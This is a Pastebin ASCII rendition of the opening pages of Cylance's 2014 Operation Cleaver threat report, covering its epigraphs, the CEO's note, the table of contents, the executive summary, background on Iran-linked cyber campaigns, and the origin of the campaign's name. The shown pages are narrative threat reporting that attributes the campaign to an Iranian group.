SHARE
TWEET

Cylance #OPCLEAVER ASCII Version

synackpwn Dec 3rd, 2014 (edited) 3,223 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. mMMMMMMNMMMMNNNNNNNNNNNNNmNNmmNNddmNMMMMMMMNNmmmmmmNMMMMhhhdhhhdMMMMMNNMMMMMMMMMMMMMNMMNNmmmmmmmmmmm
  2. dmmmmmmmmNMMmmNNMNNmmmmmmmmdhddmMMNmmMMMMMNmmmmNNNNNMMMMmNhhhhhNMMMMMhdNmmNMMMMMMMMMNNMMMNmmNNNmmNmm
  3. dddmmmmmmmmNNNmmNNNmmmmmmmmNNmdmmmddhdNNNNmmNNNMNmNNmMMMMNNMmmmmmyyhNMMMMMMMMNNNMMMMMMMMmmmmMMNNMMMM
  4. dmmmmmmNMMNNMMdshmmmmmmmddhhdmmmmNNMmmmmhydNmoNhymmhymmdMmdmmmmmmddNMMMMMMMMNNNNNMMMMMMNNhhmMMNMMMMN
  5. dmmmmmMMMMNmNNhddmmmmmmmmmmdddmyhNhdsh+d+d/y+:mmsM+hyd/d+ysd+yyymNMMMMMMMMMMMMMMMMMMMMhsdmNNNNNNNNNm
  6. mNMMMMMMMMmshdhdhdmmmmmmddddhhdooso+dssd+y+dmymhNNhhhmshoyosh/yodmydNMMMMMMMMMMMMMNh+.` .dmmmmmmmmmm
  7. NMMMMMMMMNNdddyshmdhmmNNmhyh+/s:ssoohoyhysoo+++++//+osyyyymoyoy+oo/mNNNNMNMMMMMmy/`      -mmmmmmmmmh
  8. MNmdmdhmdyhhdddddysohNmdmo+o/++dhyoo/-```.--:://///::--````.:oshdshdddmmMNmmho-`          /MMMMMmNMM
  9. mddddyssssysysyhhyyyyoos/+o+hdy+-``.:+syhdddmmmmmmmdddh+++//-.``-+shdhddys:`               +MMMmmmNN
  10. dmmmmddhyddddsydhys//+/ooyds/.`.-/hdmmmmmmhhhysydddhhhhhhddo/ss+-` `:+/-`                   oNNmmmmm
  11. hdmmmmmdddhhhyhmdhsyo/+yyo.`./yysmNdhMMMmymmdddodddddddmmmmdhsydho:                          smmmmmm
  12. yhhhhhhhhhddhyyyhoyyoyy/``:ssohy+s/hMMNNmhMMNhyommmmmmmmyyhhs/so-`                           `ymmmdd
  13. dhhmmdddhhhddh/h+hshh+``/sdmdsyhsshmNddhoyNmdy+sdmmmmmmmsdhs- `                               `hddhh
  14. ddmNNNMNhyyhdhsm+sdy. -ymdmmhddmmmmmdhhsydyssyddmmmmmmmh/:`                                    .yhyy
  15. dhhhhhdmddhodoydyd+ .sNmyyys+mhsdyydsshyhhyhddmmmNNmho-`                                   `.`  -syy
  16. yhdddddmmmyo+h+NN: :mNMMNNmdohyyhyoooymmddmmmmNMNmo.                                       /o/   sdh
  17. yydddhddmyy++yhN- /NMMMMMNNMmmNNyhhsNNmmmmmdysdmmhy:                                       `.`  -sss
  18. yyyyyhyhNodoomN: -mNmNNmmmmmddsohmdmNNNNNmdsoosyyyss/.                                   ```.-:+osso
  19. hhdddmdhshsssh/  smmmmmNNmmmdhs+hmmNNNNNMMMmmhodmmdhso:                            `.-/oyhhyho+yhddh
  20. ddmmmmmdo/sody  .dmmmmmmmhshdNmmMmmMMMMMMMMMNhsNs:--sdmo`                      ``` /dmNNdddhsooooydd
  21. mmmmmmmoyo+hm- :+mhhhhddhsdNMMMNmhhMMNMmo:/m:  h`   -hdyy`                `./++so- `hhhsoooosooooosy
  22. mmmmmmdsoosdh  yshydysyymNmNMNMMMddMMNm:  `+   /`---:+++s:            `.:/hNMNhym+` /ooyshyohhdNNNNN
  23. mmmmmmsssydm+ `y+ohyhddNMMMMMNddMNMN+..-  .+  -:-.      -+`       `./sdNNhymNmymms. -ohssyshdshmNmNM
  24. mmmmmmydyyhd: -hhhmhNMMMNNmmMNNmmmmo  .-  ./ `o.```.`    `:.   `.:ymNNNmmmdhyyhNmo+ .ooooyyyyosysddd
  25. mmmmmm//y+yy. :ddmhydMNNdhdhdymdNmm/  :-  -/   /+-.:o`     +.-ohmmNNNNmmmmmmhyoddd/ `oohmNNNMdodmhyy
  26. mmmmmmhyy/sy- /NNmmsyMNmmdhNmmMMNNy+  :-  :/   o    -y`    .NNmmNMMMMmmmmmmmmyhhds: .yhmNNNmMmyymhyh
  27. mmmmmds+o:yh: :MMMNdysdhhNNMMMMMMM.o  /:``+s:-:- `:::.     .MMMMMMMMMMNmmmmmmsmmdh: :mmmmmmmmdydmmmM
  28. mmmmNmdoyysNy `NMMMNNdyMmmmmdMMMMd +sshy+-.     -/.        yMMMMMMMMMMMMMNNNdymmmm. +mmmmmmmmmmmmmNM
  29. mmmNMMNyhhyNN` sMMMMMhMMMMNhdddmNs.:+:.       `/.         +mmdddmNMMMMMMMNNNydmmmy  hdmmmmmmdmmmmNMM
  30. mmNNMMMmyhdoMs .MMMMMhMMMmsshmmmo:.         `:o`        `+hmmNmmhdMNMMMMMNMmyddmm- /dhhmmmmdhmmmNNMM
  31. mmmNNMMmyNdomN. oMMMMmmMMhhNNo-           :odd`       `/+-hdhhdhhhhmMMMMMMMNsoomo `dmNdyhmmddhdmmmNM
  32. mmmmNNMMMmom+my` sNMMMmmMMMMh          `-/+ohs      `++.`yddhhhmNMohMMMMMNNys+ho  ohhmmmdddmdmdmmmmN
  33. dmmmmmmmNhssssdy `hMMMMmmMMMN`       -:.    `+-   .++. `yhmmmdyhhmhMMMMNms+o:oo  oddmmdmmddmNmmmmmmm
  34. mmmmMMMmmm/soohmy` yMMMMmdMMMd-   .+s.  -::/++:-://`  -dmmmmmmdmmhhNNMNs++yhm+  ommmhhddmmmNNmmmmNmm
  35. mmmmNmMNNNNdd+o+my` +NNMNNdMMMMNmNNNNy-              /dmmmmmmmmmmmodmmmyodNm+ `smmmdhddmmmNMMMMNMMMM
  36. mmNmmmmmmmmmMys+yyy: .oddNddNMMMMMMNmho              dmmmmmmmmmmmmsdhhdNMNh. -hmmmmdmMMMMMMMMMMMMMMM
  37. mNNNmmmmmmmNmms/+/hho` -smmydMMMMMNdNMh              dmmmNmdhhdmmmhydddNm/ `sNmmmdmNMMMMMMMMMMMMMMMM
  38. mmmmmmmmNNNmdmhs+//+sy+. :syssddyodMMNy              dddhdddsoydhhhyyys:``+dmMNmmmMMMMMMMMNMMMMMMMMM
  39. mmmmmmmmmNmdhNMNss/s+hhNs. ./oosomMMMNh              hdhhydhyyhhyyys+. ./hhdmdMmNNNNNMNmNMMMMMMMMMMM
  40. dmmmmmMMMMMNNNNmyyyoooshhhy/``./oymNdyo              yhyyyhhhyhys/-``:oymmNNNMMMNmmNmNNNMMMMMNNNNMNm
  41. mmmNMMMMMMMNhdhddmMmmho+soyyhs/.``:syy+              yyddddho/-``.:sdmmmNNNMNMMNNNMMMMMMMMMMMMMMMMMN
  42. MMMMMMMmmmmhdMmMMMMNNhoshoy/yoddhs/:.``              oo/:-.``-/ohddmmmNNNmMNNMMNNMMMMMMMMMMMMMMMMMMM
  43. NMMMMMNmmdhdmMMMMMNmhhdmhsoy+++oosymdh+              .---:+sshdmNMNNNNMNmmNNMhmMMMMMNMMMMMMMMMMMMMMM
  44. MmMmmMNMMMNMMMMMNMNddmmddmmdyddo++dmmms            `.+oo+++osNNMMMMMNNMNMNMMMMMNNNNmddNMMNMMMNNMMMMM
  45. NhhddNMNNMMMNNNMNNmmdddhohmdddh+/+ddmy+         .:ohsssoosddmMMMMMMMMMMMMMMMMMMMMMMNmmmddNNmNNmmmNmN
  46. ydhhhmmmmNMMNmmNmmmdddyyyhdyoosyoohsss+    ``   sodmmmmmmMMMMMNhdMNmhhMMNMNmdNMMMMMMNNNmmNMNNNmNNmmm
  47. yhmmmmmmmmNNmmmNNMNmmmmmNdhsssyydNyyyhy.:/s+-   ssydmmdmNMMMNmhsssyyooymNmmddmmmmMMNNMNMMMMMMMNNmmmm
  48. hmNmmmmmmmmmmdmmmmmmmmmMNMMNNmmMMMMmmmmdmmyy:   dmyyyhooymmdso++oooo++ooydNNmNNNmmMmdmmNmhhhhddmmddh
  49. mmmmmmmmmdmNNmdmmNNMMMMMMMMMMmdMMMMNmmmmmmmm/   mMMmhhhddysossoo+ooosshyydNMMMNhddhsyhydmddhdyyhddhh
  50. mmmmmmmmmmmmmmmNMNNmNNmmdmMmmdsNNNNmmmmmmNNs.  `/MMMMNMMMNmdNddhhddNMMMNNNMMMMMyosomMMmmmmdmdhhhhdmN
  51. mdmmmddddddmMMMMmddhhhyyyyhhhddmmmmmmmNNNMMso-.oodNNNNNNNMMMMNNNMMMMMMMMMmmNMMMNNNNMmNmmNmdmmmdhddhd
  52. dddhdmddmNMNNdddddhhhyyyyhhhhhhhmmmNMNNmMMd+/:./+ommmmmmmmMMMMMMMMMMMMMMMNNNMMNMMMMNNMNMMNmNNNmddhyh
  53. hhhyhhNNMMNNdhhdmmddhyyyyddmdhddddmmNdddmNsoo/:+++dmmmmmNNMMMMMMMMMMMMMMMMMMMMmNNMMNMMMMMMMMMMMmNmdm
  54. yyyyhdddmNdhhhdNmNNMNyhhyyhmdhdddmmmmmdhhy:::` :::+mNNmmNMMMMMMMMMNdNMMNNMMMMMMNMMMMMMMMMMMMMMMMMMMM
  55. hhhydhhhddhdmNNMMMMNMmNdhdmNNmmmdmmmmmmmh-         mMNNmMMMMMMMMMmNdymmmmNMMMMMMMMMMMMMMMMMMMMMMMMMM
  56. dmddddmmmddNMMNNMMNMMNmhdNmdmmmdhhdmmdhhy.         NNMMMMMMMMMMMMMMmMMMNmNMMMNMMMMMMMMMMMMMMMMMMMMMN
  57. mNmNNNNNNNMMMMMMMNMMMMMmhhhhhmmmdhhhdhyyh.         mMMMMMMMMMMNNdNNmmmmmmmNNmNNMNNNNNNmNNMMMMMMNNmmm
  58. MMNMMMMMMMMNMMMMMMNNNMMMmddmmmmdhyyhhhyyh/:``````//NMMNNMMMMNNdhmmmmmmdmmmmNNMNmmmmmmmddmmmNMMMNmdmm
  59. MNMMMMMMMMMMMNMMMMmhhmmNNhhdddhhhyhmmmdddhy`     yMMNNNmmMMMNdmmmNmmmmmmNmNNMmmmmmmmmmmmmmmmmmMNmmmm
  60. yomNhmmmmNNMMNmmddhyyyyhhyyyyhyhdddmmmmmdhd`  `` yMMMmNNMNNNMNMNMMNmmmmdmmmmmdmmmmmmmmmmmmdydmmmmmmm
  61. ssoooydmdmNMNmdhhhhhhhhyyyyyyhyyhdhdmddyyyo`-/+o:sMMMMMMMMNmmNNmNNmmmmmmmmmmmmmmmmmmmhddhhhydhdNNhhN
  62. hyyyo+sysdmmhyhmmdmmNmmddddhhhyhdmmddyhhdhNyyyyhymNMMMMMMMMNNNNmmmmmmmmmmddmMMNNmmmmmmmhdhhyyhyyyhdN
  63. mms***************NMMMMNMMdhhhhyhhhmNNNNMMMMMmmmmmmdmmmmmNMNNmmmmmmmmmmmdhydmMNMM****************NMM
  64. MMN****CYLANCE****mmmmmmNMNMMmhhdhhdddNMMMMMMMMNhddmmmmmNNmmmmmmmmmmmmmmmmmdddydm***#OPCLEAVER***NmN
  65. NMM***************mmNNNmmNNmmmNNNNNMMNNNmNNNmyyyhhhdddmdhhddddmmmmhyhhhhdddmmmddd****************nMM
  66. NNNMMMMNmmmmdmmNmdNmNMMMNMMNNMMMMMMMMNmNNNhhhyyyyyyyyhhyydmmdyhdhhyyyyyyhmdmmmmhdNmmmmmmmmmdsyshdNMM
  67.  
  68. /= = = = = = = = = = = = = = = = *Converted to ASCII by @SYNACKPWN* = = = = = = = = = = = = = = = =\
  69.  
  70. [CYLANCE                                                                                 #OPCLEAVER]
  71.  
  72.                                         OPERATION CLEAVER
  73.  
  74.                         “Iran should be considered a first-tier cyber power.”
  75.                                         Gabi Siboni
  76.                 Israel Institute for National Security Studies cybersecurity expert
  77.  
  78.                         “Iran has rapidly gained near parity with the Chinese but
  79.                            may be closer to the Russians in terms of swagger.”
  80.                                    Retired Admiral William J. Fallon
  81.                                         Former Commander CENTCOM
  82.  
  83.         “Global critical infrastructure organizations need to take this threat seriously.
  84.                            The Iranian adversary is real and they’re
  85.                                 coming, if not already here.”
  86.                                         Mark Weatherford
  87.      Former Deputy Under Secretary for Cybersecurity at the US Department of Homeland Security
  88.  
  89.                                 “Yes, China and one or two others
  90.                                  can shut down our power grids.”
  91.                                         Admiral Michael Rogers
  92.              Director of the National Security Agency and head of US Cyber Command
  93.  
  94.                      “The world has combated cyber threats by doing the same
  95.                     thing over and over again … It’s the definition of insanity.”
  96.                                         Jeff Moss
  97.             Co-Chair DHS Community Resiliency Task Force, Founder of DEFCON and BlackHat
  98.  
  99.                                      سکوت پاسخ می دهد
  100.                                 Jalal ad-Din Muhammad Rumi
  101.                 13th Century Persian poet, jurist, theologian and Sufi mystic
  102.                         English translation: “Silence gives answers.”
  103.  
  104. [ PG-2  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  105.  
  106.  
  107.  
  108. [CYLANCE                                                                                  #OPCLEAVER]
  109.  
  110.                                 [---PREVENTION IS EVERYTHING---]
  111.                         A personal note from Cylance, CEO Stuart McClure
  112.  
  113. On February 24, 1989, United Flight 811 left Honolulu, Hawaii, on its way to Auckland, New Zealand,
  114. with 364 souls on board. Somewhere between 23,000 and 24,000 feet an enormous explosion ejected nine
  115. passengers into the dark void over the Pacific Ocean. This aviation disaster was later determined to
  116. have been caused by a simple design flaw combined with the lack of corrective action. Boeing and the
  117. FAA had known about this problem for over one year prior to the accident. The result: nine people
  118. lost their lives. The other 337 passengers plus 18 crew members who survived, live with the memory
  119. every day; all of it due to a highly preventable design flaw. As a 19-year-old young adult, I was
  120. grateful to have survived but I had no idea how that single event would impact my future in such a
  121. profound way. Much of my passion for cybersecurity can be directly attributed to that fateful day.
  122.  
  123. The United Flight 811 accident proves just how important it is to detect flaws before tragedy
  124. strikes. Preventable disasters like this are what motivates the Cylance team to create a safer world.
  125. We do everything we can to uncover the flaws in technologies before they damage the physical or
  126. cyber world. Our mission is simple: to protect the world. This report is an attempt to deliver on
  127. that mission.
  128.  
  129. After tracking hackers both personally and professionally for more than 26 years, there is no doubt
  130. in my mind that the release of the information contained in the Operation Cleaver report is vital to
  131. the security of the world’s critical infrastructure.
  132.  
  133. The focus of the Operation Cleaver report is on one particular Iranian team we’ve dubbed
  134. Tarh Andishan, the infrastructure they utilize, as well as their tactics, techniques and procedures.
  135. Roughly translated, “Tarh Andishan” means “thinkers” or “innovators”. This team displays an evolved
  136. skillset and uses a complex infrastructure to perform attacks of espionage, theft, and the potential
  137. destruction of control systems and networks. While our investigation is ongoing, and we presently
  138. have limited visibility inside many of the compromised networks, Cylance observed Tarh Andishan
  139. actively targeting, attacking, and compromising more than 50 victims since at least 2012.
  140.  
  141. Cylance is committed to responsible disclosure and has refrained from exaggeration and embellishment
  142. in this report, limiting our content to only that which can be definitively confirmed. However, we
  143. have speculated on the possible motivations behind these attacks, given our deep knowledge and
  144. understanding of the cyber landscape. We have made every effort to notify all affected entities prior
  145.  to publishing this report. Additionally, all personally identifiable information about the members
  146.  of Operation Cleaver has been withheld. We don’t care who the adversary is, where they work or
  147.  reside, who they’re dating or what party photos they upload to Facebook – all we care about is
  148.  preventing campaigns like Operation Cleaver from negatively affecting the real world.
  149.  
  150. This report is for the world’s cyber defenders – never give up!
  151.  
  152. Stuart McClure CEO/President Cylance, Inc.
  153.  
  154. [ PG-3  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  155.  
  156.  
  157.  
  158. [CYLANCE                                                                                  #OPCLEAVER]
  159.  
  160. TABLE OF CONTENTS
  161. Executive Summary                               5
  162. Background                                      6
  163. Why the name “Cleaver”?                         8
  164. Why Expose Iran Now?                            8
  165. Critical Discoveries                            9
  166. Targets & Victims                               12
  167. Attribution                                     17
  168. Attacker IP Addresses                           18
  169. Attacker Domains                                19
  170. Tools & Software                                20
  171. Tarh Andishan                                   24
  172. Members                                         26
  173. Teams                                           30
  174. Tactics, Techniques & Procedures (TTPs)         31
  175. Initial Compromise                              32
  176. Privilege Escalation & Pivoting                 36
  177. Exfiltration                                    41
  178. Persistence                                     47
  179. Mitigation                                      60
  180. Speculation: The Why                            62
  181. Conclusion                                      65
  182. References                                      67
  183. About Cylance                                   68
  184. Cylance Products                                69
  185. Cylance Services                                70
  186. Acknowledgments                                 71
  187. The Operation Cleaver Logo                      72
  188. Appendix A: Indicators of Compromise (IOC)      73
  189.  
  190. [ PG-4  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  191.  
  192.  
  193.  
  194. [CYLANCE                                                                                  #OPCLEAVER]
  195.  
  196. EXECUTIVE SUMMARY
  197.  
  198. Since at least 2012, Iranian actors have directly attacked, established persistence in, and extracted
  199. highly sensitive materials from the networks of government agencies and major critical infrastructure
  200. companies in the following countries: Canada, China, England, France, Germany, India, Israel, Kuwait,
  201. Mexico, Pakistan, Qatar, Saudi Arabia, South Korea, Turkey, United Arab Emirates, and the United States.
  202.  
  203. Iran is the new China.
  204.  
  205. Operation Cleaver has, over the past several years, conducted a significant global surveillance and
  206. infiltration campaign. To date it has successfully evaded detection by existing security technologies.
  207. The group is believed to work from Tehran, Iran, although auxiliary team members were identified in
  208. other locations including the Netherlands, Canada, and the UK. The group successfully leveraged both
  209. publicly available, and customized tools to attack and compromise targets around the globe.
  210. The targets include military, oil and gas, energy and utilities, transportation, airlines, airports,
  211. hospitals, telecommunications, technology, education, aerospace, Defense Industrial Base (DIB),
  212. chemical companies, and governments.
  213.  
  214. During intense intelligence gathering over the last 24 months, we observed the technical capabilities
  215. of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort.
  216. As Iran’s cyber warfare capabilities continue to morph,2 the probability of an attack that could
  217. impact the physical world at a national or global level is rapidly increasing.3 Their capabilities
  218. have advanced beyond simple website defacements, Distributed Denial of Service (DDoS) attacks, and
  219. Hacking Exposed style techniques.
  220.  
  221. With minimal separation between private companies and the Iranian government, their modus operandi
  222. seems clear: blur the line between legitimate engineering companies and state- sponsored cyber
  223. hacking teams to establish a foothold in the world’s critical infrastructure.
  224.  
  225. Iran’s rising expertise, along with their choice of victims, has compelled us to release this report
  226. sooner than we would have liked in order to expose Operation Cleaver to the world. The evidence and
  227. indicators of compromise we provide in this report will allow potentially unaware victims to detect
  228. and eliminate Cleaver’s incursions into their networks.
  229.  
  230. [ PG-5  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  231.  
  232.  
  233.  
  234. [CYLANCE                                                                                  #OPCLEAVER]
  235.  
  236. BACKGROUND
  237.  
  238. Iran has been severely impacted by debilitating and extremely advanced malware campaigns since at
  239. least 2009. Famous examples of these efforts include industrial sabotage via Stuxnet (2009 - 2010),
  240. and espionage with Duqu (2009 - 2011) as well as Flame (2012). These campaigns have targeted Iran’s
  241. nuclear program, and oil and gas operations. Stuxnet was an eye-opening event for Iranian authorities,
  242. exposing them to the world of physical destruction via electronic means.
  243.  
  244. Hacking campaigns sourced out of Iran are nothing new. Since the early 2000’s, the information
  245. security industry as a whole has tracked teams like the Iranian Cyber Army, which mainly focuses on
  246. patriotic hacking (website defacements). After the release of Stuxnet, Iran’s motivations appear to
  247. have shifted. Retaliation for Stuxnet began almost immediately in 2011 with campaigns like the
  248. certificate compromises of Comodo and DigiNotar. These attacks served as a warning, showcasing the
  249. rapid evolution of Iran’s hacking skills.
  250.  
  251. A major retaliation came in the form of 2012’s Shamoon campaign, which impacted RasGas and Saudi Aramco.
  252. It’s estimated that Shamoon impacted over 30,000 computer endpoints and cost  the affected companies
  253. tens-of-thousands of hours recovering from the attacks. The direct financial impact from this
  254. retaliation and amount of downtime experienced were staggering. Shamoon was truly a watershed event
  255. for security defenders. It was the first glimpse into the real capability and intention of Iranian
  256. cyber operations. We see the same motivation and intent here in Operation  Cleaver: establishing a
  257. beachhead for cyber sabotage.
  258.  
  259. We saw further Iranian backlash in late 2012 and early 2013 in the form of Operation Ababil’s
  260. Distributed Denial of Service (DDoS) attacks against US banks. These attacks were debilitating and
  261. impacted the availability of online banking services. Yet more backlash was witnessed with FireEye’s
  262. exposure of Operation Saffron Rose, an espionage campaign executed by the Ajax Security Team
  263. in 2014. In May 2014, evidence emerged of a highly targeted waterhole attack that leveraged social
  264. media, dubbed Operation Newscaster, which was uncovered by iSight Partners.
  265.  
  266. In June 2013, Israeli Prime Minister Benjamin Netanyahu accused Iran of carrying out “non-stop”
  267. attacks on “[Israel’s] vital national systems” including “water, power and banking”4. The following
  268. September of 2013, the Wall Street Journal accused Iran of hacking into unclassified U.S. Navy computers
  269. in San Diego’s NMCI (Navy Marine Corp Intranet),5 which we can confirm was part of Operation Cleaver.
  270.  
  271. [ PG-6  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  272.  
  273.  
  274.  
  275. [CYLANCE                                                                                  #OPCLEAVER]
  276.  
  277.  
  278. While previously reported operations attributed to Iran have largely focused on Defense Industrial Base (DIB)
  279. companies, the United States Federal Government, or targets in Middle Eastern countries, Operation Cleaver
  280. has instead focused on a wide array of targets, including energy producers and utilities, commercial
  281. airlines and airports, military intelligence, aerospace, hospitals, and even universities – with only
  282. ten of the targets based in the United States. Such broad targeting demonstrates to the world that
  283. Iran is no longer content to retaliate against the US and Israel alone. They have bigger intentions:
  284. to position themselves to impact critical infrastructure globally.
  285.  
  286.                 ORIGINATION                                             RETALIATION
  287.                 OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
  288.                                                 [2010]
  289.                                 STUXNET------------|
  290.                                                    |
  291.                                                 [2011]
  292.                                                    |----------COMODO
  293.                                 DUQU---------------|
  294.                                                    |---------DIGINOTAR
  295.                                                 [2012]
  296.                                 FLAME--------------|
  297.                                                    |----------SHAMOON
  298.                                 GAUSS--------------|
  299.                                                    |--------OPERATION ABABIL
  300.                                                 [2013]
  301.                                                    |-------NAVY MARINE CORP INTRANET
  302.                                                 [2014]
  303.                                                    |----------SAFRON ROSE
  304.                                                    |----------NEWSCASTER
  305.                                                    |----------OPCLEAVER
  306.                 OoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
  307.  
  308. Figure 1: The sequence of major Iran-centric attacks; either as victims (left) or attackers (right).
  309.  
  310. [ PG-7  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  311.  
  312.  
  313.  
  314. [CYLANCE                                                                                  #OPCLEAVER]
  315.  
  316. WHY THE NAME CLEAVER?
  317.  
  318. The string cleaver is found several times in a variety of custom software used in
  319. Operation Cleaver, including:
  320.  
  321. 1)      Numerous references inside the namespaces of their custom bot code codenamed TinyZBot, e.g.:
  322.  
  323.         e:\projects\cleaver\trunk\zhoupin_cleaver\obj\x86\release\netscp.pdb
  324.  
  325. 2)      PDBs associated with the hacker name “Jimbp”, e.g.:
  326.  
  327.         c:\users\jimbp\desktop\binder_1 - for cleaver\binder_1\obj\x86\release\setup.pdb
  328.  
  329. 3)      PDBs associated with the keystroke loggers, artifacts, and numerous other tools, e.g.:
  330.         e:\Projects\Cleaver\trunk\MainModule\obj\Release\MainModule.pdb
  331.  
  332.  
  333. WHY EXPOSE IRAN NOW?
  334.  
  335. We believe our visibility into this campaign represents only a fraction of Operation Cleaver’s full scope.
  336. We believe that if the operation is left to continue unabated, it is only a matter of time before the
  337. world’s physical safety is impacted by it. While the disclosure of this information will be a detriment
  338. to our ability to track the activity of this group, it will allow the security industry as a whole to
  339. defend against this threat. As such, we are exposing this cyber campaign early in an attempt to minimize
  340. additional real-world impact and prevent further victimization.
  341.  
  342. [ PG-8  Original Report: http://www.cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf ]
  343.  
  344.  
  345.  
  346. [CYLANCE                                                                                  #OPCLEAVER]
  347.  
  348.  
  349. @@@@@@@@@@@@@@@@@@@@@@@@###@@@@(((@@@@@@@@@@@%%#@@@@@@@%###%##%&@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%%%%%%
  350. %#####%%#@@&%%@@@@#%%%%%%%%((%#&@@#%%@@@@@#%%%%@@@#@@@@@@@###%#@@@@@@/@&%%@@@@@@@@@@&@@@@@%#@@@%@@%
  351. %#%%%%%%%%@@@%%%@@#%%%%%%%%       CRITICAL DISCOVERIES       @@%%%%%(((@@@@%##@#@@%&@%&@@@@%@@%%@@@
  352. #%%%%%%@@@@@@@(/%%%%%%%%%(((%%%%@@@@#####@@&&%/,,@&*/@&@@@###@##%#@@@@@@@@@%%@@%%@@@@@@@##@@@@@@@@&
  353. (%%%%#@@@@#%@@#%%%%%%%%%%%%(%%(/@@/@/#%/%((/#(@(@@.(,@((&@&(.%%%#@@@@@%@@@@@@@@@@@@@@%%(@@@####@@%%
  354. #@@@@@@@@@/(((#%%%%%%%%%(%%%%%###%,%%,@%/(/#@/@.@@/*###,%(@/%*/(%@&@%@@@@@@@@@@@@@@%    %%%%%%%%%%%
  355. @@@@@@@@@@@%%((&%%@#%#@@%&((,*(.%.%,#%%%%%/,,      .,(&%%#((#*.**(@#@@@@@@@@@@@@.        /########%
  356. @#&(#&(###@###(///@&&(.%.&(%%#&,       .,**//**,.       .#######@@&@&&%             @@@@@&%@@
  357. %%%%(%%%%%%%%&(((((((.%(( (.%%%.    *#%%%%%%%%%%%%%#%##*(((,    .#(%#(##(/                 @@@@%%#@
  358. %%%%%%#####%/(#(((((.(.(,%%%    ,%%%%%%%%%#(*/*%%%###%###%%.,(#*    (&                     .&&&&&&&
  359. (%%%%%%%%(((((%%%%,(((%   ,%%/%@@/#@@@(@@%%%##%%%##%%%%%%%%/%%##.                          %%%%%%
  360. (((((((((%%#(((&%%%*%%%   ##//%#,.#@@&&@@@/#%%%%%%%%*#//**(                              ,%%%%@
  361. #(#@(####((%((#@(%%%%   ##%%#(#//%&@%%#(/&@###*#%%%%%%%%#%#*                                  .%%##
  362. %%@@@@@(((((%%#%.@@.  #%%&@&/@&&&%%%%##*%#(*(%%%%%%%%%%%.                                      *###
  363. #(((((#%%%(##,@(%@  *@@#/((/*%/(%((&/(%##/#%%%%%%@@%&                                           (##
  364. (#%%%%%%%@,/&%&@(  @&@@@@&%%/#%#/%///@%%%%%%%%@@&(                                        ,//*  /##
  365. (####(#%%,.#%&@#  @@@@@@@&&@@&&#,&@&%%%%%#//%%%//                                             ///
  366. ((((###(&((%*@/  %%%@@%%%%%%%/*/%%%%%%@@%%(/////////(                                        ((((((
  367. ##%%%%#@#*.(#/   %%%%%%&@%%%%/,,%%%%&@@@@@@@@(#@@@@(//                               ,#%%@%%&//%%%%
  368. ######%@. ,#%   (%%%%%%%%,(&@@@@@&@@@@@@@@@@@/#@    @(%/                        ,  %%%%#((((//////%
  369. %%%%%%(%.#,%(  (%%///%%#/%%&@@@#@/&@@@@#  /,  ,#    #%(#(                  *(&*#,. %###/(///(//////
  370. %%%%%%%%  %%  *(%/%%#/%@@&@@&@@@@%@@@@%   /    ..((,../*/              ,((@@@%/%#/ .///%/%(/%%@@@@@
  371. %%%%%%*%,@%%  ((#(###@@@@@@@&%/&@@@#  *   #   #.        .(         .#@@@%##@#%//  /%%/%/#%%&/@#%&
  372. %%%%%%%%*%@#  %%%&@%@@@@%%%%&%&%&%%   (   %   (.   ,      (     (#&&%%%%%%%(*%#&/(  (////%%@@/((&@@
  373. %%%%%%*.%*((  ##%%((@@######%&%%%   #   #    %   *(      / #%%%&@@@%%%%%%%%/####  *//@@@@@@//@@##
  374. %%%%%%&&(/((  @@%%%#&@%#@@@@@@&   (   #   .*    .#     (@&%%@@@@@%%%%%%%%(%%%/  /%%%%@%@@%/###(
  375. %%%%%%(&*(((  &@@@&%((((&@@@@@@@@,*   #  .%#((.  .#        &@@@@@@@@@@@%%%%%%%%%%%  %%%%%%%%%@/%@@@
  376. %%%%@@/#@@*@  /@@@%@@#@@@@@@@@@  &@,        /         ,@@@@@@@@@@@@@%@@@/%%%%( .%%%%%%%%%%%%%%@
  377. %%%@@@@, &@@(  &@@@@%@@@@@#(%&/(% (*          (.          (#/((@@@@@@@@%&&(%%%%. %#%%%%%%%@%%&@@@
  378. %%@&@@@,@,@%@. ,@@@@%@@@@(((%&@#            .%          /#%%%%%%/&&&@@@@@@#(#&/  @(#%%%%#(#%%%%@@
  379. %%%&%@@@,@&&@@  @@@@@#@@@&@@%            .%%%,        *# /#%#%##%(#@@@@@@@@%%,%%  (@##%%%%%%%#@
  380. %%%%#@@@@**%/  @@@@%#@@@@@,          /.  *%       (/  #%%###%@@@(@@@@@@%(/(%(  ,%%%%%#%%%%%%%%%%%
  381. %%%%%%%%%%%.%,@#  @@@@@&@@@@&       .(       #    (/   ###%%%##%%%@@@@&%/*/,/(  *%%#%#%%%%%@@%%%%%%
  382. %%%&@@#@@%## (%%(  @@@@%@@@@@%   .(%    ###(,         %%%%%%%%%%%/%%%@%/*&&@&  ,%%%%#%%#%%%%%%%%@@%
  383. %%%%%#@@%@@%,/@*%#  %@@@@%@@@@@@&@@@&%               %%%%%%%%%%%%%#%%%%(#%%/  ,%%%%%#@@@@@@@@@@@@@@
  384. %@@&%%%%%%%%@@%,/((,  (##%#%&@@@@@@#(#              .%%%@%%%%%%%%%/#/%@@@%   %%%%%%@@@@@@@@@@@@@@@@
  385. %##%%%%%%@@%#*#* (&%(   #%#*&@@@@@#@@@              .%%%%%#(((%%%%%####%   ###%%%%@@@@@&@@@@@@@@@@@
  386. %%%%%%%%%@%(#@%@**(.(%%   (#((#**#@@@&              .#######/########(   *%%%@&%&&@@&@@@@&@@@@@@@@@
